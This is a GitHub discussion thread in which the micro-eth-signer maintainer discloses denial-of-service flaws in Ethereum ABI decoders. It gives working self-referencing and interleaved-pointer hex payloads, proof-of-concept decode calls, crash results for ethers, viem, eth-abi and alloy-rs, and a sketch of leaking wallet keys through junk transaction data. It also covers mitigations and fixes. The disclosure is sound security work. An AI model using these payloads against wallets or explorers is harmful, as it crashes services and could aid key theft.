ZSTs, ABIs, stolen keys and broken legs #20

paulmillr · 2024-01-18T09:23:27Z

paulmillr
Jan 18, 2024
Maintainer

ZST is a new attack on ETH ABI parsers. It's low priority since it only causes Denial of Service - there is no Remote Code Execution.

Unfortunately, micro-eth-signer was partially affected. Unexpectedly, ethers.js was fine.

You break my parser - I break your ~~legs~~ parser

Our parser was broken. How about we take the offensive and break all other parsers?

What's ABI?

ABI (Application Binary Interface) is computer-friendly "documentation" for Ethereum smart contracts. An account wishing to use a smart contract's function uses the ABI to hash the function definition, so it can create the EVM bytecode required to call the function. micro-eth-signer is a tiny JS library that works with transactions and smart contracts, so it has to parse ABI-encoded data. Underneath, it uses micro-packed, a very cool lib for handling binary data.

As an example, here's a part of Uniswap ABI:

{
  "type": "function",
  "name": "getReserves",
  "outputs": [
    { "name": "reserve0", "type": "uint112" },
    { "name": "reserve1", "type": "uint112" },
    { "name": "blockTimestampLast", "type": "uint32" }
  ]
}
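To make the JSON above concrete: all three outputs are static types, so the return data is simply three 32-byte words in declaration order. Below is a minimal sketch of reading them. The helper name `decodeStaticOutputs` and the reserve values are made up for illustration; this is not micro-eth-signer's API.

```javascript
// ABI fragment from the example above.
const getReserves = {
  type: "function",
  name: "getReserves",
  outputs: [
    { name: "reserve0", type: "uint112" },
    { name: "reserve1", type: "uint112" },
    { name: "blockTimestampLast", type: "uint32" },
  ],
};

// Hypothetical helper: handles only static uintN outputs, one 32-byte word each.
function decodeStaticOutputs(abiItem, hexData) {
  const result = {};
  abiItem.outputs.forEach((out, i) => {
    const wordHex = hexData.slice(i * 64, (i + 1) * 64);
    if (wordHex.length !== 64) throw new Error(`missing word for ${out.name}`);
    const bits = BigInt(out.type.replace("uint", ""));
    const value = BigInt("0x" + wordHex);
    // A uintN value must fit into N bits; the rest of the word is zero padding.
    if (value >> bits !== 0n) throw new Error(`${out.name} does not fit ${out.type}`);
    result[out.name] = value;
  });
  return result;
}

// Made-up return data: reserve0 = 1000, reserve1 = 2000, timestamp = 1705569807.
const word = (n) => n.toString(16).padStart(64, "0");
const returnData = word(1000n) + word(2000n) + word(1705569807n);
const reserves = decodeStaticOutputs(getReserves, returnData);
console.log(reserves);
```

No pointers are involved here, which is why static outputs like these are not affected by the attacks described below.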

Recursion

Ethereum ABI has pointers, which means we can cause cycles by creating a pointer which refers to itself: e.g. the 32-byte 0000000000000000000000000000000000000000000000000000000000000000
ABI pointers are unsigned 256-bit integers. So much efficiency!
There are no pointers in an ABI definition; they are auto-created for dynamic structures
You can't define a recursive structure in an ABI definition. Meaning, a long chain of pointers requires a long definition: O(N) complexity
However, we have dynamic arrays, which are placed behind pointers by default
If we can create an array which consists of itself, we can cause DoS by combinatorial explosion

Suppose we have the array [[], []]. If we replace every inner array with the outer array itself, we get a circular reference:

const a = [[], []];
console.log("a", a);
a[0] = a;
a[1] = a;

console.log("a[a]", a);

which outputs:

a [ [], [] ]
a[a] <ref *1> [ [Circular *1], [Circular *1] ]

JS is smart enough to catch this. But what about ABI parsers?

Tricking a parser

If we can create an array of two elements which references itself, we can add [][][][][] (depth=5) to the definition, and it will create 2**5 arrays.

An array starts with a pointer. The structure looks like [u256(ptr), u256(arrayLen), ...u256(elements)]. This means the actual array starts at 0x20 (32 bytes in, which is the value of ptr stored in the first 32 bytes).

To act as a pointer, all array values should be equal to this ptr. Let's look at the result:

const payload =
  '0000000000000000000000000000000000000000000000000000000000000020' + // main array ptr
  '0000000000000000000000000000000000000000000000000000000000000002' + // main array length (2 elements)
  '0000000000000000000000000000000000000000000000000000000000000020' + // first array element (acts as ptr to array itself)
  '0000000000000000000000000000000000000000000000000000000000000020'; // second array element

const results = {
  'uint256[]': [32n, 32n],
  // Now we see basic explosion: decoded result takes significantly more memory than input
  // NOTE: each 0n is 32 bytes
  'uint256[][]': [
    [
      0n, 0n, 0n, 0n, 0n, 0n, 0n, 0n,
      0n, 0n, 0n, 0n, 0n, 0n, 0n, 0n,
      0n, 0n, 0n, 0n, 0n, 0n, 0n, 0n,
      0n, 0n, 0n, 0n, 0n, 0n, 0n, 0n
    ],
    [
      0n, 0n, 0n, 0n, 0n, 0n, 0n, 0n,
      0n, 0n, 0n, 0n, 0n, 0n, 0n, 0n,
      0n, 0n, 0n, 0n, 0n, 0n, 0n, 0n,
      0n, 0n, 0n, 0n, 0n, 0n, 0n, 0n
    ],
  ],
  'uint256[][][]': [
    [
      [], [], [], [], [], [], [], [],
      [], [], [], [], [], [], [], [],
      [], [], [], [], [], [], [], [],
      [], [], [], [], [], [], [], []
    ],
    [
      [], [], [], [], [], [], [], [],
      [], [], [], [], [], [], [], [],
      [], [], [], [], [], [], [], [],
      [], [], [], [], [], [], [], []
    ],
  ],
};

The result is unexpected:

Instead of 32n, there is 0n in nested arrays
Array size is 32 instead of 2
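The results above can be reproduced with a very naive decoder. The sketch below rests on two assumptions that are not taken from any particular library: reads past the end of the input return zero, and every dereferenced pointer starts a new scope that nested pointers are relative to. The names `readWord` and `decodeArray` are hypothetical.

```javascript
// Read a 32-byte big-endian word; bytes past the end of `scope` read as zero (assumption).
function readWord(scope, pos) {
  let value = 0n;
  for (let i = 0; i < 32; i++) {
    const byte = pos + i < scope.length ? scope[pos + i] : 0;
    value = (value << 8n) | BigInt(byte);
  }
  return value;
}

// Decode uint256 followed by `depth` pairs of brackets, e.g. depth 2 is uint256[][].
function decodeArray(scope, ptrPos, depth) {
  const ptr = Number(readWord(scope, ptrPos));
  const array = scope.subarray(ptr); // dereferencing creates a new scope
  const length = Number(readWord(array, 0));
  const body = array.subarray(32); // element pointers are relative to the body
  const out = [];
  for (let i = 0; i < length; i++) {
    out.push(depth === 1 ? readWord(body, i * 32) : decodeArray(body, i * 32, depth - 1));
  }
  return out;
}

// Same four words as the payload above: ptr, length 2, and two elements equal to 0x20.
const word = (n) => n.toString(16).padStart(64, "0");
const payload = Buffer.from(word(0x20n) + word(2n) + word(0x20n) + word(0x20n), "hex");
const flat = decodeArray(payload, 0, 1);
const nested = decodeArray(payload, 0, 2);
const deeper = decodeArray(payload, 0, 3);
console.log(flat, nested.map((a) => a.length), deeper.map((a) => a.length));
```

Under these assumptions the decoder returns [32n, 32n] for uint256[], two arrays of 32 zeros for uint256[][], and two arrays of 32 empty arrays for uint256[][][], matching the results above. Both inner pointers resolve to the last word of the input, which is then read as a length of 32.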

This happens because ETH ABI has "nested" pointers, which feels like a poor man's attempt to fight recursive pointers. Every pointer is an absolute position inside a scope, but whenever a pointer is dereferenced, it creates a new scope:

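// Sketch: `decode` and `inner` stand in for the parser and the element type.
const data = new Uint8Array([1, 2, 3, 4]);
const ptr = data[0]; // pointer, relative to the start of the current scope
const scope = data.subarray(ptr); // dereferencing creates a new scope
decode(scope, inner); // pointers inside `scope` are relative to `scope`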

Why is it bad? (most things in ETH spec are bad, just look at those 256-bit pointers)

You can easily rule out loops by enforcing that a ptr only points to data after the pointer itself (or only before; the direction just has to be the same for all pointers). Then no ptr can point to any previous data, and the next pointer in an array cannot reuse the data of the previous one. Most libraries already construct data in a way that passes this check. There can be some compat issues with something obscure.
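One way to read that rule as code, as a deliberately simplified sketch: every pointer in an array head must land past the head itself and strictly after the previous pointer. The function name and the exact rule are assumptions made for illustration; a complete check would also track where each element's data ends.

```javascript
// `pointers`: byte offsets read from an array head, relative to the start of that head.
function assertForwardOnly(pointers) {
  const headSize = BigInt(pointers.length) * 32n; // one 32-byte slot per pointer
  let previous = headSize - 1n; // the first pointer must be >= headSize
  for (const [i, ptr] of pointers.entries()) {
    if (ptr <= previous) {
      throw new Error(`pointer #${i} (${ptr}) points backwards or reuses earlier data`);
    }
    previous = ptr;
  }
}

// A conventional layout: data for each element follows the two-slot head.
assertForwardOnly([64n, 128n]);

// The self-referencing payload from above: both elements are 0x20, inside the head.
let rejected = false;
try {
  assertForwardOnly([32n, 32n]);
} catch {
  rejected = true;
}
console.log("self-referencing head rejected:", rejected);
```

The second call fails on the first pointer already, because 0x20 points into the head rather than past it.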

Scopes try to do the same, but in a significantly more complicated way. Scopes can be better for compression, at the cost of DoS attacks.

This also means that a pointer (0x20) points at the first element instead of the 'count'. With scopes, every element in an array of pointers can point to the same data.

This means we can create an array of N elements by encoding only a single element. Furthermore, we can create nested elements which "spend" only a single pointer per depth level. The check in ethers tries to fix this bug, but bypassing it only requires adding 32 more pointers to the input.

Proof of concept

const payload =
  "0000000000000000000000000000000000000000000000000000000000000020" +
  "000000000000000000000000000000000000000000000000000000000000000a" +
  "0000000000000000000000000000000000000000000000000000000000000020".repeat(64);

// smaller
// const payload =
//   '0000000000000000000000000000000000000000000000000000000000000020' +
//   '000000000000000000000000000000000000000000000000000000000000000a' +
//   '0000000000000000000000000000000000000000000000000000000000000020'.repeat(10) +
//   '0000000000000000000000000000000000000000000000000000000000000000'.repeat(32);

// even smaller!
// const payload =
//   '0000000000000000000000000000000000000000000000000000000000000020' +
//   '0000000000000000000000000000000000000000000000000000000000000005' +
//   '0000000000000000000000000000000000000000000000000000000000000020'.repeat(6) +
//   '0000000000000000000000000000000000000000000000000000000000000000'.repeat(32);

const ethers = require("ethers").AbiCoder.defaultAbiCoder();
const { throws } = require("node:assert");

throws(() =>
  ethers.decode(["uint256[][][][][][][][][][]"], Buffer.from(payload, "hex")),
);
throws(() =>
  ethers.decode(["bytes[][][][][][][][][][]"], Buffer.from(payload, "hex")),
);
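To get a feeling for the amplification without actually exhausting memory, the number of decoded values can be counted instead of allocated. The sketch below models a naive decoder under two assumptions (out-of-bounds reads return zero, each dereference starts a new scope) and memoizes by resolved address. `countLeaves` is a hypothetical helper, not part of ethers or micro-eth-signer, and it still loops once per element pointer, so it is not hardened itself.

```javascript
// Read a 32-byte big-endian word at an absolute offset; out-of-bounds bytes read as zero.
function readWord(data, pos) {
  let value = 0n;
  for (let i = 0; i < 32; i++) {
    const byte = pos + i < data.length ? data[pos + i] : 0;
    value = (value << 8n) | BigInt(byte);
  }
  return value;
}

// Count the uint256 values a naive decoder would produce for uint256 + `depth` pairs of [].
function countLeaves(data, depth) {
  const memo = new Map();
  // `arrayStart` is the absolute offset of an array's length word.
  const visit = (arrayStart, level) => {
    const key = `${arrayStart}:${level}`;
    if (memo.has(key)) return memo.get(key);
    const length = readWord(data, arrayStart);
    const body = arrayStart + 32;
    let total = 0n;
    if (level === 1) {
      total = length;
    } else {
      for (let i = 0n; i < length; i++) {
        const ptr = readWord(data, body + Number(i) * 32);
        total += visit(body + Number(ptr), level - 1);
      }
    }
    memo.set(key, total);
    return total;
  };
  return visit(Number(readWord(data, 0)), depth);
}

const w = (n) => n.toString(16).padStart(64, "0");
const poc = Buffer.from(w(0x20n) + w(0x0an) + w(0x20n).repeat(64), "hex");
const leaves = countLeaves(poc, 10);
console.log(`${poc.length} input bytes -> ${leaves} decoded uint256 values`);
```

In this model the first payload above, decoded with ten levels of nesting, yields 10 * 32**9 values from 2112 bytes of input: the outer array has length 10, and every deeper level reads 0x20 as its length.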

Now, all zero users of our library can feel secure!

Results

ethereumjs-abi (js, 0.6.8)
- ZST: crashes
- Recursive: crashes
Ethers (js, 6.9.2)
- ZST: ok
- Recursive: crashes
eth-abi (python)
- ZST: ok
  - Was fixed, assumed moderate severity, "no need for bounty"
- Recursive: crashes (takes a while to eat all memory, 1h for 59gb, very inefficient!)
ethers.rs (rust, unrelated to original ethers.js)
- Deprecated in favor of alloy-rs
- ZST: crashes
- Recursive: ??? (hard api to test)
Alloy-rs (rust)
- ZST: ok
- non ZST big arrays (ZST payload with uint32[1][]): eats all memory (LOL!)
- recursive: eats all memory
viem (js, 2.0.0)
- ZST: crashes
- Recursive: crashes
micro-eth-signer
- ZST: fixed now
- Recursive: was cool from the beginning. Who is vulnerable now?

More bugs

We've crashed all popular libraries. Let's try to crash micro-eth-signer now. The payload is surprisingly easy:

Create an array of pointers, each pointing to an array located after the current one. Add a simple array of values at the end:

const arr10 = abi.mapComponent(unwrapTestType("uint256[][][][][][][][][][]"));
const a = [[], [], [], [], [], [], [], [], [], []];
const ptrArr = abi.mapComponent(unwrapTestType("uint256[]"));
const mainPtr = hex.encode(
  ptrArr.encode(a.map((_, i) => BigInt(a.length - i + 1) * 32n)), // use the index, not the element
);
console.log("TTT", arr10.decode(hex.decode(mainPtr.repeat(10 + 1))));

The payload is larger than the previous one, but it bypasses our checks.

Pointers are hard! You can encode very complex structures without pointers: look at micro-packed and ed25519-keygen's PGP implementation.

It was fixed by prohibiting dereferencing a pointer to the same address more than once. Check out the micro-packed source code.
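The idea behind that fix can be sketched in a few lines. This is an illustration only, assuming the decoder resolves every pointer to an absolute byte offset before following it; the class name `PointerGuard` is made up and this is not the micro-packed code.

```javascript
// Remembers every address a pointer has resolved to and refuses to follow it twice.
class PointerGuard {
  constructor() {
    this.seen = new Set();
  }
  // `address` is the absolute byte offset the pointer resolves to.
  deref(address) {
    if (this.seen.has(address)) {
      throw new Error(`pointer to offset ${address} dereferenced more than once`);
    }
    this.seen.add(address);
    return address;
  }
}

const guard = new PointerGuard();
guard.deref(32); // outer array
guard.deref(96); // first inner array
let blocked = false;
try {
  guard.deref(96); // second inner array reuses the same data
} catch {
  blocked = true;
}
console.log("second dereference blocked:", blocked);
```

One guard instance has to live for the whole decode call; creating a fresh one per nesting level would let the repeated pointers through again.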

Interleave

We are secure now. Right? Did I tell you that pointers are hard? Basically, if one encoded byte can be used twice in output, DoS can happen.

Let's look at arrays. A 10-element array is represented as len(10)[9, 8, 7, ...]. By construction, when parsed as uint256[][], it creates these arrays:

len(10)[9, 8, 7, ...]
len(9)[8, 7, 6, 5, ...]
len(8)[7, 6, 5, ...]
...

This should cause a size explosion of N -> N**2/2.
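The N**2/2 figure is just the sum of the overlapping array lengths. A small sketch that ignores pointers and padding entirely and only counts words (the function name `interleaved` is made up for illustration):

```javascript
// Flat input: [n, n-1, ..., 1, 0]. Every suffix reads as a valid "length + elements" array.
function interleaved(n) {
  const words = Array.from({ length: n + 1 }, (_, i) => n - i);
  const arrays = [];
  for (let start = 0; start < n; start++) {
    const length = words[start]; // first word of the suffix acts as the length
    arrays.push(words.slice(start + 1, start + 1 + length));
  }
  const outputWords = arrays.reduce((sum, a) => sum + a.length, 0);
  return { inputWords: words.length, outputWords };
}

const { inputWords, outputWords } = interleaved(10);
console.log(`${inputWords} input words -> ${outputWords} output words`);
```

For n = 10 this turns 11 input words into 10 + 9 + ... + 1 = 55 output words, that is n * (n + 1) / 2.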

Elements are pointers, so each should point to a specific element of the array.

[32, 64, 96, 128, ...] -> the last element is big and requires a lot of padding
What if we reverse the order? [128, 96, 64, 32] -> an element needs roughly half of the biggest array as padding
Unaligned pointer reads are impossible: elements would be too big (requires huge padding, because it is U32 max)

The result:

Length	Expected	Result	Overhead
4	6KB	6KB	0x
8	15KB	30KB	1x
16	30KB	123KB	3x
32	63KB	510KB	7x
64	129KB	2MB	15x
128	260KB	8MB	31x
256	522KB	33MB	63x
512	1MB	133MB	127x
1024	2MB	533MB	255x
2048	4MB	2GB	511x
4096	8MB	crash	1023x

These sizes are for hex strings; the byte size is 2x smaller. Check out the code in abi.test.js.

Mitigation

How can the errors be fixed?

Quick-and-dirty: limit input size and pray that nobody finds a PoC with a higher explosion coefficient
Suboptimal: disable nested arrays. Unclear if it will help, but token/NFT APIs don't use arrays, and Uniswap only uses plain arrays. Can break complex cases. Gives no guarantee that the same can't be triggered without them, as long as pointers are involved
Correct: ensure every byte is read only once during decoding.
- Complicated to implement. Maybe just switch to our micro-packed?
- Allows finding unread bytes, which also solves junk-data problem
- Significantly reduces chance of expansion-related DoS
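The "read once" option could be sketched as a thin wrapper around the input that marks consumed bytes. This is an illustration under the assumption that the decoder performs all reads through one such object; `ReadOnceReader` is a hypothetical name and not how any of the libraries above implement it.

```javascript
class ReadOnceReader {
  constructor(data) {
    this.data = data;
    this.used = new Uint8Array(data.length); // 1 = byte already consumed
  }
  // Return `len` bytes at `pos`, failing if any of them was read before.
  read(pos, len) {
    if (pos < 0 || pos + len > this.data.length) throw new Error("read out of bounds");
    for (let i = pos; i < pos + len; i++) {
      if (this.used[i]) throw new Error(`byte ${i} read twice`);
      this.used[i] = 1;
    }
    return this.data.subarray(pos, pos + len);
  }
  // Bytes nobody asked for: junk data or unused padding.
  unreadBytes() {
    let count = 0;
    for (const flag of this.used) if (!flag) count++;
    return count;
  }
}

const reader = new ReadOnceReader(new Uint8Array(96));
reader.read(0, 32); // pointer
reader.read(32, 32); // length
const leftover = reader.unreadBytes();
let doubleRead = false;
try {
  reader.read(0, 32); // a second pointer resolving to the same word
} catch {
  doubleRead = true;
}
console.log({ leftover, doubleRead });
```

The same bookkeeping covers both problems from the list: a double read throws immediately, and a non-zero `unreadBytes()` after decoding signals junk data.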

Stealing keys with junk data

If there are any pointers in an encoding, libraries won't catch additional data in it. While going through all transactions, we found a real Uniswap tx with injected data. micro-eth-signer caught it, other libraries didn't.

At first glance, this could be used for fingerprinting. A bad client would be able to inject an IP or UUID into all transactions. Bad, but not too bad.

However, suppose we have a cold wallet which is airgapped and can't access a network. Transactions are transferred by manually copying / typing every tx byte. With junk data, the wallet could inject private keys into transactions with ABI calls. Moreover, the keys could be encrypted. ABI decoding libraries generally won't see them, so a user would assume the tx is safe. An attacker, however, would be able to parse the blockchain, find the TXs and extract the keys.

How can this be mitigated? One way is doing a round-trip of encode(decode(data)), which would show the differences. However, the spec doesn't enforce anything related to pointers and value positions, so any significantly different encoder would create a lot of false positives. Another way is using micro-eth-signer. Whenever it's necessary to parse an unsafe tx, ptrArr.decode(p, { allowUnreadBytes: true }) could be used. For a PoC, take a glance at our abi.test.js
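The round-trip idea can be sketched for a single uint256[] argument. The encoder and decoder below are minimal stand-ins written for this example (hypothetical names, word-aligned pointers assumed), not the API of any library mentioned here.

```javascript
const word = (n) => n.toString(16).padStart(64, "0");

// Canonical layout: pointer 0x20, length, then the values.
function encodeUint256Array(values) {
  return word(0x20n) + word(BigInt(values.length)) + values.map((v) => word(v)).join("");
}

// Lenient decoder: follows the pointer and ignores everything it was not asked to read.
function decodeUint256Array(hexData) {
  const at = (i) => {
    const chunk = hexData.slice(i * 64, (i + 1) * 64);
    if (chunk.length !== 64) throw new Error(`word ${i} is out of bounds`);
    return BigInt("0x" + chunk);
  };
  const ptr = at(0);
  if (ptr % 32n !== 0n) throw new Error("unaligned pointer");
  const start = Number(ptr / 32n);
  const length = Number(at(start));
  return Array.from({ length }, (_, i) => at(start + 1 + i));
}

// True when re-encoding the decoded values gives back exactly the same bytes.
const roundTrips = (hexData) =>
  encodeUint256Array(decodeUint256Array(hexData)) === hexData.toLowerCase();

const clean = encodeUint256Array([1n, 2n]);
const withJunk = clean + word(0xdeadbeefn); // trailing data no decoder reads
const shifted = word(0x40n) + word(0xdeadbeefn) + word(2n) + word(1n) + word(2n); // junk behind the pointer
console.log(roundTrips(clean), roundTrips(withJunk), roundTrips(shifted));
```

All three inputs decode to the same values, but only the first one survives the round trip. The third input also shows where false positives come from: an encoder that merely lays out its data differently would be flagged in the same way.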

Conclusion

ETH nodes are safe: ETH ABI is not stored on-chain, and nodes don't parse ABIs.

Block explorers and wallets are affected, whenever they touch ABIs.

As for bad events:

Find an ABI / spec with arrays in definition
Send public events with payload to blockchain
Crash all clients which watch specific wallets
Tokens / NFTs look safe. Does an API with arrays even exist?
No need to parse unsafe ABI at all

Status as of Jan 18, 2024:

Ethers, Viem - fixed
Others: notified / not fixed

Thanks to Viem for offering a reward for the finding.

hazae41 · 2024-01-18T12:50:34Z

Thanks for the report, I fixed it in Cubane (it went into an infinite loop)

Maybe there is an issue here

a.map((i) => BigInt(a.length - i + 1) * 32n)

https://github.com/paulmillr/micro-eth-signer/blob/9ccd3def6af06799214656a58b20cef4ca544c44/test/abi.test.js#L1681C39-L1681C39

It should be (_,i) instead of (i)?

1 reply

paulmillr Jan 18, 2024
Maintainer Author

Yes. Fixed now.

Academy312 · 2024-01-29T11:38:13Z

thx

kryptokisa · 2024-02-02T15:52:38Z

Thanks

esaulpaugh · 2024-09-15T17:46:52Z

I haven't been able to get headlong to misbehave. I added a decoded array length limit in August 2020 and currently I decode array lengths as uint21 (with validation, largest accepted array is length 2^21 -1).

So I either get something like

java.lang.IllegalArgumentException: array index 0: unsigned val exceeds bit limit: 76 > 21 (from my integer decode validation)

or

java.nio.BufferUnderflowException (end of input reached unexpectedly; from Java ByteBuffer)

or

java.lang.IllegalArgumentException: not enough bytes remaining: 96 < 1024 (from my array decoding code)

The last one is generated by calculating the minimum possible byte length for the array:

 /**
  * Abort early if the input is obviously too short. Best effort to fail fast before allocating memory for the array.
  */
  private void checkNoDecodePossible(final int remaining, final int arrayLen) {
      final int minByteLen = !dynamic
                              ? headLength
                              : elementType.dynamic
                                  ? arrayLen * OFFSET_LENGTH_BYTES
                                  : !(elementType instanceof ByteType)
                                      ? arrayLen * elementType.headLength()
                                      : (flags & ABIType.FLAG_LEGACY_DECODE) != 0
                                          ? arrayLen
                                          : Integers.roundLengthUp(arrayLen, UNIT_LENGTH_BYTES);
      if (remaining < minByteLen) {
          throw new IllegalArgumentException("not enough bytes remaining: " + remaining + " < " + minByteLen);
      }
  }

Maybe this will help somebody.

Also, headlong supports backwards offset jumps and maybe checkNoDecodePossible will throw for some really funky encodings even though they might be legal and spec-compliant (I try to allow everything the spec allows). But nobody has complained about this code wrongly rejecting anything yet.
